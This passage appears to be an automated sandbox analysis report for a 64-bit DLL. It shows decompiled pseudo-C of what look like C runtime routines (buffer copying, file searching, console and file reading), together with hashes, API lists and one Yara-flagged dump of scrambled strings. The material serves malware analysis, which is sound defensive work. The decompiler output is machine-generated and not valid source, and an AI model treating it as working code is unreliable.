                                                                      				_t142 = E0000000118005053C(_t238, _t241, __rcx + 4, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t304, _t318);
                                                                      				goto 0x8004efec;
                                                                      				_t201 =  *__rcx;
                                                                      				_t322 = __rcx + 4;
                                                                      				if (_t201 - 1 > 0) goto 0x8004ee44;
                                                                      				_t168 =  *_t322;
                                                                      				 *__rcx = _t142;
                                                                      				_t306 = _t238 << 2;
                                                                      				E0000000118005053C(_t238, _t241, _t322, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t306, _t316);
                                                                      				if (_t168 != 0) goto 0x8004edba;
                                                                      				r9d = 0;
                                                                      				 *(_t282 + 0x2e0) = r12d;
                                                                      				 *__rcx = r12d;
                                                                      				E0000000118005053C(_t238, _t241, _t322, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t306, _t312);
                                                                      				r15d =  *(_t285 + 0x20);
                                                                      				goto 0x8004efee;
                                                                      				if (_t168 == 1) goto 0x8004edae;
                                                                      				r10d =  *__rcx;
                                                                      				if (r10d == 0) goto 0x8004edae;
                                                                      				r8d = r12d;
                                                                      				r9d = r12d;
                                                                      				_t311 = _t241;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r10d) goto 0x8004edd0;
                                                                      				if (r8d == 0) goto 0x8004edae;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004ee17;
                                                                      				r15d =  *(_t285 + 0x20);
                                                                      				 *(__rcx + 4 + _t238 * 4) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004efee;
                                                                      				r9d = 0;
                                                                      				 *(_t282 + 0x2e0) = r12d;
                                                                      				_t297 = _t282 + 0x2e4;
                                                                      				 *__rcx = r12d;
                                                                      				_t254 = _t322;
                                                                      				E0000000118005053C(_t238, _t241, _t254, _t264 * _t311 + _t238, _t279, _t297, _t306, _t274);
                                                                      				r15d =  *(_t285 + 0x20);
                                                                      				goto 0x8004efee;
                                                                      				_t219 = 0 - _t201;
                                                                      				if (_t219 < 0) goto 0x8004ee55;
                                                                      				_t268 = _t322;
                                                                      				 *(_t285 + 0x30) = _t268;
                                                                      				if (( *(_t276 + 2) & 0 | _t219 > 0x00000000) == 0) goto 0x8004ee77;
                                                                      				 *(_t282 + 0x110) = r12d;
                                                                      				r13d = 0;
                                                                      				if (0 == 0) goto 0x8004ef93;
                                                                      				goto 0x8004ee8b;
                                                                      				r13d = _t201;
                                                                      				 *(_t282 + 0x110) = 0;
                                                                      				_t199 =  *((intOrPtr*)(_t268 + _t241 * 4));
                                                                      				if (_t199 != 0) goto 0x8004eeb4;
                                                                      				if (0 != 0) goto 0x8004ef88;
                                                                      				_t67 = _t241 + 1; // 0x1
                                                                      				_t175 = _t67;
                                                                      				 *((intOrPtr*)(_t282 + 0x114 + _t241 * 4)) = _t199;
                                                                      				 *(_t282 + 0x110) = _t175;
                                                                      				goto 0x8004ef88;
                                                                      				r10d = 0;
                                                                      				if (0 == 0) goto 0x8004ef7e;
                                                                      				r11d = 0;
                                                                      				r11d =  ~r11d;
                                                                      				if (0 == 0x73) goto 0x8004ef24;
                                                                      				r9d = 0;
                                                                      				if (0 != _t175) goto 0x8004eee8;
                                                                      				_t72 = _t238 + 1; // 0x1
                                                                      				 *(_t282 + 0x114 + _t306 * 4) = 0;
                                                                      				 *(_t282 + 0x110) = _t72;
                                                                      				r8d =  *(_t282 + 0x2e4 + _t254 * 4);
                                                                      				_t300 = _t297 * _t276 + _t254 + _t254;
                                                                      				 *(_t282 + 0x114 + _t306 * 4) = r8d;
                                                                      				if (_t311 + _t238 != 0) goto 0x8004eec7;
                                                                      				if (r10d == 0) goto 0x8004ef7e;
                                                                      				if (1 == 0x73) goto 0x8004efc2;
                                                                      				r8d = 1;
                                                                      				if (1 !=  *(_t282 + 0x110)) goto 0x8004ef55;
                                                                      				_t88 = _t238 + 1; // 0x1
                                                                      				 *(_t282 + 0x114 + _t300 * 4) = 0;
                                                                      				 *(_t282 + 0x110) = _t88;
                                                                      				_t195 =  *(_t282 + 0x114 + _t300 * 4);
                                                                      				 *(_t282 + 0x114 + _t300 * 4) = _t195;
                                                                      				_t184 =  *(_t282 + 0x110);
                                                                      				r10d = _t195;
                                                                      				if (_t195 != 0) goto 0x8004ef30;
                                                                      				if (2 == 0x73) goto 0x8004efc2;
                                                                      				if (1 != r13d) goto 0x8004ee90;
                                                                      				r9d = _t184;
                                                                      				 *__rcx = _t184;
                                                                      				E0000000118005053C(_t238, _t241, _t322,  *(_t285 + 0x30), _t279, _t282 + 0x114, _t306 << 2, _t278);
                                                                      				r15d =  *(_t285 + 0x20);
                                                                      				r13d =  *(_t285 + 0x24);
                                                                      				r12d = 0;
                                                                      				goto 0x8004efee;
                                                                      				r12d = 0;
                                                                      				r9d = 0;
                                                                      				 *(_t285 + 0x40) = r12d;
                                                                      				 *__rcx = r12d;
                                                                      				E0000000118005053C(_t238, _t241, _t322,  *(_t285 + 0x30), _t279, _t285 + 0x44, _t306 << 2, _t281);
                                                                      				r15d =  *(_t285 + 0x20);
                                                                      				r13d =  *(_t285 + 0x24);
                                                                      				if (0 == 0) goto 0x8004f083;
                                                                      				r15d = r15d - r13d;
                                                                      				 *(_t285 + 0x20) = r15d;
                                                                      				if (0 != 0) goto 0x8004ec10;
                                                                      				r8d =  *(_t285 + 0x2c);
                                                                      				r8d = r8d - _t238 + _t238 * 4 + _t238 + _t238 * 4;
                                                                      				if (0 == 0) goto 0x8004f057;
                                                                      				if ( *((intOrPtr*)(0x180000000 + 0x63568 + _t238 * 4)) != 0) goto 0x8004f0a5;
                                                                      				 *(_t285 + 0x40) = r12d;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r12d;
                                                                      				E0000000118005053C(_t238, _t241, __rcx + 4, 0x180000000, _t279, _t285 + 0x44, _t306 << 2);
                                                                      				return E000000011800028F0(1, _t184,  *(_t282 + 0x4b0) ^ _t285);
                                                                      			}




































                                                                      0x18004eba0
                                                                      0x18004ebb0
                                                                      0x18004ebb8
                                                                      0x18004ebbf
                                                                      0x18004ebc6
                                                                      0x18004ebc9
                                                                      0x18004ebd0
                                                                      0x18004ebd3
                                                                      0x18004ebdc
                                                                      0x18004ebed
                                                                      0x18004ebf0
                                                                      0x18004ebf4
                                                                      0x18004ebf7
                                                                      0x18004ebfd
                                                                      0x18004ec14
                                                                      0x18004ec17
                                                                      0x18004ec1b
                                                                      0x18004ec2c
                                                                      0x18004ec4e
                                                                      0x18004ec54
                                                                      0x18004ec6a
                                                                      0x18004ec7b
                                                                      0x18004ec7f
                                                                      0x18004ec8d
                                                                      0x18004ec9b
                                                                      0x18004eca1
                                                                      0x18004eca8
                                                                      0x18004ecab
                                                                      0x18004ecba
                                                                      0x18004ecc1
                                                                      0x18004ecc9
                                                                      0x18004eccf
                                                                      0x18004ecd5
                                                                      0x18004ecd9
                                                                      0x18004ece2
                                                                      0x18004ece5
                                                                      0x18004ece8
                                                                      0x18004ecf3
                                                                      0x18004ed05
                                                                      0x18004ed14
                                                                      0x18004ed19
                                                                      0x18004ed21
                                                                      0x18004ed23
                                                                      0x18004ed2a
                                                                      0x18004ed2d
                                                                      0x18004ed32
                                                                      0x18004ed35
                                                                      0x18004ed43
                                                                      0x18004ed4e
                                                                      0x18004ed53
                                                                      0x18004ed58
                                                                      0x18004ed5b
                                                                      0x18004ed62
                                                                      0x18004ed68
                                                                      0x18004ed75
                                                                      0x18004ed78
                                                                      0x18004ed84
                                                                      0x18004ed8b
                                                                      0x18004ed8d
                                                                      0x18004ed90
                                                                      0x18004ed9e
                                                                      0x18004eda9
                                                                      0x18004edae
                                                                      0x18004edb5
                                                                      0x18004edbd
                                                                      0x18004edbf
                                                                      0x18004edc5
                                                                      0x18004edc7
                                                                      0x18004edca
                                                                      0x18004edcd
                                                                      0x18004edd3
                                                                      0x18004edf4
                                                                      0x18004edf9
                                                                      0x18004ee01
                                                                      0x18004ee03
                                                                      0x18004ee08
                                                                      0x18004ee0f
                                                                      0x18004ee12
                                                                      0x18004ee17
                                                                      0x18004ee1a
                                                                      0x18004ee21
                                                                      0x18004ee28
                                                                      0x18004ee30
                                                                      0x18004ee33
                                                                      0x18004ee38
                                                                      0x18004ee3f
                                                                      0x18004ee44
                                                                      0x18004ee50
                                                                      0x18004ee52
                                                                      0x18004ee55
                                                                      0x18004ee5c
                                                                      0x18004ee64
                                                                      0x18004ee6a
                                                                      0x18004ee6f
                                                                      0x18004ee75
                                                                      0x18004ee80
                                                                      0x18004ee83
                                                                      0x18004ee90
                                                                      0x18004ee95
                                                                      0x18004ee99
                                                                      0x18004ee9f
                                                                      0x18004ee9f
                                                                      0x18004eea2
                                                                      0x18004eea9
                                                                      0x18004eeaf
                                                                      0x18004eeb4
                                                                      0x18004eebb
                                                                      0x18004eec1
                                                                      0x18004eec4
                                                                      0x18004eeca
                                                                      0x18004eecc
                                                                      0x18004eed1
                                                                      0x18004eed3
                                                                      0x18004eed6
                                                                      0x18004eee2
                                                                      0x18004eeee
                                                                      0x18004ef04
                                                                      0x18004ef0e
                                                                      0x18004ef22
                                                                      0x18004ef27
                                                                      0x18004ef33
                                                                      0x18004ef39
                                                                      0x18004ef3e
                                                                      0x18004ef40
                                                                      0x18004ef43
                                                                      0x18004ef4f
                                                                      0x18004ef55
                                                                      0x18004ef65
                                                                      0x18004ef6d
                                                                      0x18004ef77
                                                                      0x18004ef7c
                                                                      0x18004ef81
                                                                      0x18004ef8d
                                                                      0x18004ef93
                                                                      0x18004ef9d
                                                                      0x18004efac
                                                                      0x18004efb1
                                                                      0x18004efb8
                                                                      0x18004efbd
                                                                      0x18004efc0
                                                                      0x18004efc2
                                                                      0x18004efca
                                                                      0x18004efcd
                                                                      0x18004efd7
                                                                      0x18004efdd
                                                                      0x18004efe2
                                                                      0x18004efe7
                                                                      0x18004eff0
                                                                      0x18004eff6
                                                                      0x18004f000
                                                                      0x18004f00a
                                                                      0x18004f01b
                                                                      0x18004f025
                                                                      0x18004f028
                                                                      0x18004f037
                                                                      0x18004f03d
                                                                      0x18004f042
                                                                      0x18004f045
                                                                      0x18004f052
                                                                      0x18004f082

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: 160cb99277df454bd72f9a32923aea7ef305dfa1e6ceb021dfa8ae0ab30364ad
                                                                      • Instruction ID: a2fc928d0e72bde2e4f36c74fcdfb140851dd5ce67eb31e174d77331f4458554
                                                                      • Opcode Fuzzy Hash: 160cb99277df454bd72f9a32923aea7ef305dfa1e6ceb021dfa8ae0ab30364ad
                                                                      • Instruction Fuzzy Hash: 9EE19E72204AC88AE7B6CF15D484BEA77A4F34E7CCF519426EA0947B84DB35CA49CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %o[>$)65$1Zam$3U$VZ$X/$]<$n22$zUgU$k
                                                                      • API String ID: 0-1058936433
                                                                      • Opcode ID: 49fa304ac972c191e285c65c3236d969994f04a803b17e4ebbcb83e9e1211164
                                                                      • Instruction ID: e3401742c3de389dd0f02e9704aaea4a22aa4b024f6606b94c62176e2949716b
                                                                      • Opcode Fuzzy Hash: 49fa304ac972c191e285c65c3236d969994f04a803b17e4ebbcb83e9e1211164
                                                                      • Instruction Fuzzy Hash: C192C27190478C8FEB58CFA8D89A59D7FB1FB44384F20422DF85A972A1D7749889CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 64%
                                                                      			E000000011800427CC(void* __ecx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, signed long long* __rdx, long long _a8, long long _a16, intOrPtr _a18, signed long long _a24, long long _a32) {
                                                                      				signed long long _v72;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr* _v88;
                                                                      				void* __rsi;
                                                                      				void* _t33;
                                                                      				void* _t34;
                                                                      				signed long long* _t45;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr* _t78;
                                                                      				void* _t79;
                                                                      				intOrPtr* _t84;
                                                                      				intOrPtr* _t87;
                                                                      				intOrPtr* _t90;
                                                                      				signed long long _t91;
                                                                      				intOrPtr* _t92;
                                                                      				void* _t101;
                                                                      				long long _t105;
                                                                      				signed long long _t113;
                                                                      				intOrPtr* _t119;
                                                                      				intOrPtr* _t120;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed long long _t132;
                                                                      				long long _t134;
                                                                      				signed long long _t140;
                                                                      				intOrPtr* _t141;
                                                                      				signed long long _t143;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				r15d = 0;
                                                                      				if (__rdx != 0) goto 0x80042808;
                                                                      				E00000001180013B18(__rax);
                                                                      				_t45 =  &(__rdx[2]);
                                                                      				 *__rax = _t45;
                                                                      				E00000001180013928();
                                                                      				goto 0x800429df;
                                                                      				asm("xorps xmm0, xmm0");
                                                                      				 *__rdx = _t143;
                                                                      				_t76 =  *__rcx;
                                                                      				asm("movdqu [ebp-0x20], xmm0");
                                                                      				_v72 = _t143;
                                                                      				if (_t76 == 0) goto 0x800428c0;
                                                                      				_a16 = 0x3f2a;
                                                                      				_a18 = r15b;
                                                                      				E000000011800527A0();
                                                                      				if (_t76 != 0) goto 0x8004287d;
                                                                      				r8d = 0;
                                                                      				0x80042e00();
                                                                      				if (_t45 == 0) goto 0x8004288f;
                                                                      				_t119 = _v88;
                                                                      				_t84 = _t119;
                                                                      				if (_t119 == _v80) goto 0x80042943;
                                                                      				_t33 = E0000000118003F8F4(_t76,  *_t84);
                                                                      				if (_t84 + 8 != _v80) goto 0x80042866;
                                                                      				goto 0x80042943;
                                                                      				0x80043114();
                                                                      				if (_t33 != 0) goto 0x80042898;
                                                                      				goto 0x8004281a;
                                                                      				_t120 = _v88;
                                                                      				_t87 = _t120;
                                                                      				if (_t120 == _v80) goto 0x80042943;
                                                                      				_t34 = E0000000118003F8F4( *((intOrPtr*)(_t84 + 0x10)),  *_t87);
                                                                      				if (_t87 + 8 != _v80) goto 0x800428a9;
                                                                      				goto 0x80042943;
                                                                      				_t121 = _v88;
                                                                      				_t122 = _v80;
                                                                      				_t113 = _t143;
                                                                      				_a24 = _t113;
                                                                      				_t78 = _t121;
                                                                      				_t140 = (_t122 - _t121 >> 3) + 1;
                                                                      				if (_t121 == _t122) goto 0x8004290a;
                                                                      				_t101 = (_t132 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)( *_t78 + _t101)) != r15b) goto 0x800428ee;
                                                                      				_t79 = _t78 + 8;
                                                                      				if (_t79 != _t122) goto 0x800428e8;
                                                                      				_a24 = _t113 + 1 + _t101;
                                                                      				r8d = 1;
                                                                      				E0000000118003AC54(_t34, _t140, _t113 + 1 + _t101,  *_t78);
                                                                      				if (_t79 != 0) goto 0x80042952;
                                                                      				E0000000118003F8F4(_t79, _t140);
                                                                      				_t90 = _t121;
                                                                      				if (_t121 == _t122) goto 0x80042940;
                                                                      				E0000000118003F8F4(_t79,  *_t90);
                                                                      				_t91 = _t90 + 8;
                                                                      				if (_t91 != _t122) goto 0x8004292f;
                                                                      				E0000000118003F8F4(_t79, _t121);
                                                                      				goto 0x800429df;
                                                                      				_t105 = _t79 + _t140 * 8;
                                                                      				_t141 = _t121;
                                                                      				_a32 = _t105;
                                                                      				_t134 = _t105;
                                                                      				if (_t121 == _t122) goto 0x800429b1;
                                                                      				_a16 = _t79 - _t121;
                                                                      				if ( *((char*)( *_t141 + (_t143 | 0xffffffff) + 1)) != 0) goto 0x80042973;
                                                                      				if (E00000001180052610(_t79 - _t121, _t91, _t134, _t105 - _t134 + _a24, _t122,  *_t141, (_t143 | 0xffffffff) + 2) != 0) goto 0x800429f7;
                                                                      				 *((long long*)(_a16 + _t141)) = _t134;
                                                                      				if (_t141 + 8 != _t122) goto 0x8004296c;
                                                                      				 *__rdx = _t91;
                                                                      				E0000000118003F8F4(_a16, _a32);
                                                                      				_t92 = _t121;
                                                                      				if (_t121 == _t122) goto 0x800429d5;
                                                                      				E0000000118003F8F4(_a16,  *_t92);
                                                                      				if (_t92 + 8 != _t122) goto 0x800429c4;
                                                                      				E0000000118003F8F4(_a16, _t121);
                                                                      				return 0;
                                                                      			}






























                                                                      0x1800427cc
                                                                      0x1800427e3
                                                                      0x1800427ef
                                                                      0x1800427f1
                                                                      0x1800427f6
                                                                      0x1800427fa
                                                                      0x1800427fc
                                                                      0x180042803
                                                                      0x180042808
                                                                      0x18004280b
                                                                      0x18004280e
                                                                      0x180042811
                                                                      0x180042816
                                                                      0x18004281d
                                                                      0x180042827
                                                                      0x180042830
                                                                      0x180042834
                                                                      0x18004283f
                                                                      0x180042845
                                                                      0x18004284a
                                                                      0x180042853
                                                                      0x180042855
                                                                      0x180042859
                                                                      0x180042860
                                                                      0x180042869
                                                                      0x180042876
                                                                      0x180042878
                                                                      0x180042884
                                                                      0x18004288d
                                                                      0x180042896
                                                                      0x180042898
                                                                      0x18004289c
                                                                      0x1800428a3
                                                                      0x1800428ac
                                                                      0x1800428b9
                                                                      0x1800428bb
                                                                      0x1800428c0
                                                                      0x1800428c8
                                                                      0x1800428cc
                                                                      0x1800428d2
                                                                      0x1800428d9
                                                                      0x1800428e0
                                                                      0x1800428e6
                                                                      0x1800428ee
                                                                      0x1800428f5
                                                                      0x1800428fa
                                                                      0x180042904
                                                                      0x180042906
                                                                      0x18004290a
                                                                      0x180042913
                                                                      0x18004291e
                                                                      0x180042922
                                                                      0x180042927
                                                                      0x18004292d
                                                                      0x180042932
                                                                      0x180042937
                                                                      0x18004293e
                                                                      0x180042946
                                                                      0x18004294d
                                                                      0x180042952
                                                                      0x180042956
                                                                      0x180042959
                                                                      0x18004295d
                                                                      0x180042963
                                                                      0x180042968
                                                                      0x18004297b
                                                                      0x180042997
                                                                      0x1800429a1
                                                                      0x1800429af
                                                                      0x1800429b3
                                                                      0x1800429b7
                                                                      0x1800429bc
                                                                      0x1800429c2
                                                                      0x1800429c7
                                                                      0x1800429d3
                                                                      0x1800429d8
                                                                      0x1800429f6

                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00000001800427FC
                                                                        • Part of subcall function 0000000180013978: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,0000000180013926,?,?,?,?,?,000000018001380E), ref: 0000000180013981
                                                                        • Part of subcall function 0000000180013978: GetCurrentProcess.KERNEL32(?,?,?,?,0000000180013926,?,?,?,?,?,000000018001380E), ref: 00000001800139A6
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 0000000180042A5C
                                                                      • FindFirstFileExW.KERNEL32 ref: 0000000180042B66
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$CurrentFeatureFileFindFirstPresentProcessProcessor
                                                                      • String ID: *?
                                                                      • API String ID: 1182102293-2564092906
                                                                      • Opcode ID: 09c4c5ac1566981091877ec3f62f0a2c22e35fbe740cbf6310a3d14b663fd6da
                                                                      • Instruction ID: c5d54596b75f223bbe08b69dddbcda8a1d656c5783ba2cb6e6569f48f3cd91ba
                                                                      • Opcode Fuzzy Hash: 09c4c5ac1566981091877ec3f62f0a2c22e35fbe740cbf6310a3d14b663fd6da
                                                                      • Instruction Fuzzy Hash: 4502C332714B9841EBA6DB26D9803ED6791E74CBE8F968112FE4907BC9DF38C649C304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00000001180058338(signed int __ecx, void* __edi, void* __esi, signed int* __rax, void* __rcx, long long __rdx, void* __rsi, long long __r8, char _a8, long long _a16, intOrPtr _a32) {
                                                                      				signed int* _v72;
                                                                      				char _v80;
                                                                      				signed int _v88;
                                                                      				signed int* _v96;
                                                                      				void* _v104;
                                                                      				signed int _v120;
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				signed char _t127;
                                                                      				signed int _t141;
                                                                      				void* _t151;
                                                                      				void* _t155;
                                                                      				char _t169;
                                                                      				char _t170;
                                                                      				signed int _t174;
                                                                      				void* _t193;
                                                                      				void* _t194;
                                                                      				void* _t195;
                                                                      				unsigned int _t197;
                                                                      				void* _t200;
                                                                      				long long _t205;
                                                                      				signed int* _t241;
                                                                      				signed long long _t248;
                                                                      				signed short* _t252;
                                                                      				signed int* _t254;
                                                                      				void* _t255;
                                                                      				signed int* _t256;
                                                                      				intOrPtr _t265;
                                                                      				intOrPtr _t266;
                                                                      				signed long long _t272;
                                                                      				long long _t284;
                                                                      				unsigned long long _t285;
                                                                      				signed short* _t287;
                                                                      				signed long long _t290;
                                                                      				signed long long _t291;
                                                                      				signed short* _t295;
                                                                      				signed short* _t297;
                                                                      				unsigned long long _t299;
                                                                      				signed long long _t300;
                                                                      				signed int* _t302;
                                                                      				char* _t303;
                                                                      				char* _t304;
                                                                      
                                                                      				_t284 = __r8;
                                                                      				_a16 = __rdx;
                                                                      				r13d = r8d;
                                                                      				if (r12d != 0xfffffffe) goto 0x80058373;
                                                                      				E00000001180013AF8(__rax);
                                                                      				 *__rax =  *__rax & 0x00000000;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 9;
                                                                      				goto 0x8005876f;
                                                                      				if (__ecx < 0) goto 0x80058757;
                                                                      				_t200 = r12d -  *0x80071c40; // 0x40
                                                                      				if (_t200 >= 0) goto 0x80058757;
                                                                      				r8d = 1;
                                                                      				_v80 = __r8;
                                                                      				_t290 = __ecx >> 6;
                                                                      				_v88 = _t290;
                                                                      				_t300 = __ecx + __ecx * 8;
                                                                      				_t265 =  *((intOrPtr*)(0x80071840 + _t290 * 8));
                                                                      				if ((r8b &  *(_t265 + 0x38 + _t300 * 8)) == 0) goto 0x80058757;
                                                                      				if (r13d - 0x7fffffff <= 0) goto 0x800583e3;
                                                                      				E00000001180013AF8(__ecx);
                                                                      				 *__ecx =  *__ecx & 0x00000000;
                                                                      				_t127 = E00000001180013B18(__ecx);
                                                                      				 *__ecx = 0x16;
                                                                      				goto 0x8005876a;
                                                                      				if (r13d == 0) goto 0x80058753;
                                                                      				if ((_t127 & 0x00000002) != 0) goto 0x80058753;
                                                                      				_t205 = __rdx;
                                                                      				if (_t205 == 0) goto 0x800583cb;
                                                                      				r11d =  *((char*)(_t265 + 0x39 + _t300 * 8));
                                                                      				_t241 =  *((intOrPtr*)(_t265 + 0x28 + _t300 * 8));
                                                                      				_v96 = _t241;
                                                                      				_a8 = r11b;
                                                                      				_t23 = _t255 + 4; // 0x4
                                                                      				r15d = _t23;
                                                                      				if (_t205 == 0) goto 0x80058452;
                                                                      				if (r11d - r8d != r8d) goto 0x8005844a;
                                                                      				if ((r8b &  !r13d) != 0) goto 0x8005844a;
                                                                      				E00000001180013AF8(_t241);
                                                                      				 *_t241 =  *_t241 & 0;
                                                                      				E00000001180013B18(_t241);
                                                                      				 *_t241 = 0x16;
                                                                      				E00000001180013928();
                                                                      				goto 0x800585e1;
                                                                      				goto 0x800584d1;
                                                                      				if ((r8b &  !r13d) == 0) goto 0x8005842e;
                                                                      				_t193 =  <  ? r15d : r13d >> 1;
                                                                      				E0000000118003F930(_t241, __rcx, __rdx);
                                                                      				_t256 = _t241;
                                                                      				E0000000118003F8F4(_t241, __rcx);
                                                                      				E0000000118003F8F4(_t241, __rcx);
                                                                      				_t302 = _t256;
                                                                      				if (_t256 != 0) goto 0x800584a3;
                                                                      				E00000001180013B18(_t241);
                                                                      				 *_t241 = 0xc;
                                                                      				E00000001180013AF8(_t241);
                                                                      				 *_t241 = 8;
                                                                      				goto 0x800585e1;
                                                                      				_t28 = _t265 + 1; // 0x1
                                                                      				r8d = _t28;
                                                                      				E00000001180057060(__edi, _t241, _t256, 0x80071840, __rsi);
                                                                      				_t291 = _v88;
                                                                      				r8d = 1;
                                                                      				r11b = _a8;
                                                                      				 *( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x30 + _t300 * 8) = _t241;
                                                                      				_t266 =  *((intOrPtr*)(0x80071840 + _t291 * 8));
                                                                      				_v72 = _t302;
                                                                      				r10d = 0x18007184a;
                                                                      				if (( *(_t266 + 0x38 + _t300 * 8) & 0x00000048) == 0) goto 0x80058569;
                                                                      				_t141 =  *((intOrPtr*)(_t266 + 0x3a + _t300 * 8));
                                                                      				if (_t141 == r10b) goto 0x80058569;
                                                                      				if (_t193 == 0) goto 0x80058569;
                                                                      				 *_t302 = _t141;
                                                                      				_t303 = _t302 + _t284;
                                                                      				_t194 = _t193 - 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x3a + _t300 * 8)) = r10b;
                                                                      				if (r11b == 0) goto 0x80058569;
                                                                      				_t169 =  *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x3b + _t300 * 8));
                                                                      				if (_t169 == r10b) goto 0x80058569;
                                                                      				if (_t194 == 0) goto 0x80058569;
                                                                      				 *_t303 = _t169;
                                                                      				_t304 = _t303 + _t284;
                                                                      				_t195 = _t194 - 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x3b + _t300 * 8)) = r10b;
                                                                      				if (r11b != r8b) goto 0x80058569;
                                                                      				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x3c + _t300 * 8));
                                                                      				if (_t170 == r10b) goto 0x80058569;
                                                                      				if (_t195 == 0) goto 0x80058569;
                                                                      				 *_t304 = _t170;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _t291 * 8)) + 0x3c + _t300 * 8)) = r10b;
                                                                      				if (E0000000118005192C(r12d,  *((intOrPtr*)(0x80071840 + _t291 * 8))) == 0) goto 0x800585ff;
                                                                      				_t248 =  *((intOrPtr*)(0x80071840 + _v88 * 8));
                                                                      				if ( *((char*)(_t248 + 0x38 + _t300 * 8)) >= 0) goto 0x800585ff;
                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x800585ff;
                                                                      				if (_a8 != 2) goto 0x80058604;
                                                                      				_v120 = _v120 & 0x00000000;
                                                                      				_t197 = _t195 - 1 >> 1;
                                                                      				r8d = _t197;
                                                                      				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0x800585f3;
                                                                      				E00000001180013A8C(GetLastError(), _t248, _v96);
                                                                      				E0000000118003F8F4(_t248, _t256);
                                                                      				goto 0x80058772;
                                                                      				goto 0x80058640;
                                                                      				_v80 = 0;
                                                                      				_v120 = _v120 & 0x00000000;
                                                                      				r8d = _t197;
                                                                      				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x8005871d;
                                                                      				if (_a32 - r13d > 0) goto 0x8005871d;
                                                                      				if ( *((char*)( *((intOrPtr*)(0x80071840 + _v88 * 8)) + 0x38 + _t300 * 8)) >= 0) goto 0x800585e4;
                                                                      				_t285 = 0x80071840 + _t248 * 2 + _a32;
                                                                      				if (_a8 == 2) goto 0x8005868b;
                                                                      				_t272 = _t304 + _t284;
                                                                      				_v120 = _t299 >> 1;
                                                                      				_t151 = E00000001180057EB8(_t150, 0, r12d, 0x80071840 + _t248 * 2 + _a32, __esi, _t256, _t272, _t285, _a16);
                                                                      				goto 0x800585e4;
                                                                      				if (_v80 == 0) goto 0x8005870b;
                                                                      				_t297 = _v72;
                                                                      				_t252 = _t297;
                                                                      				_t295 =  &(_t297[_t285 >> 1]);
                                                                      				if (_t297 - _t295 >= 0) goto 0x800586fe;
                                                                      				r11d = 0xa;
                                                                      				_t174 =  *_t252 & 0x0000ffff;
                                                                      				if (_t174 == 0x1a) goto 0x800586f3;
                                                                      				if (_t174 != 0xd) goto 0x800586d9;
